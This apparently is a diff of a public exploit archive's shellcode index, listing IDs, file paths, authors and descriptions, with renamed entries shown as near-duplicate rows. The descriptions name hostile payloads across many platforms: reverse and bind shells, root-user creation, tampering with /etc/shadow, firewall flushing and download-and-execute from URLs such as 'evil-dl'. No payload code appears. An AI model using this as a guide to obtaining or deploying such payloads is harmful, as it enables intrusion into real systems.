13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86
@ -191,7 +191,7 @@ id,file,description,date,author,type,platform
13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13439,shellcodes/linux_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,linux_x86
@ -203,8 +203,8 @@ id,file,description,date,author,type,platform
13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86
13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86
@ -217,7 +217,7 @@ id,file,description,date,author,type,platform
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
@ -225,12 +225,12 @@ id,file,description,date,author,type,platform
13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc
@ -245,12 +245,12 @@ id,file,description,date,author,type,platform
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
@ -258,7 +258,7 @@ id,file,description,date,author,type,platform
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
@ -281,10 +281,10 @@ id,file,description,date,author,type,platform
13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
@ -297,7 +297,7 @@ id,file,description,date,author,type,platform
13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86
13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
@ -329,7 +329,7 @@ id,file,description,date,author,type,platform
13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64
13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
@ -370,11 +370,11 @@ id,file,description,date,author,type,platform
13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
@ -386,20 +386,20 @@ id,file,description,date,author,type,platform
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
14234,shellcodes/linux/14234.c,"Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux
14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
@ -407,24 +407,24 @@ id,file,description,date,author,type,platform
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
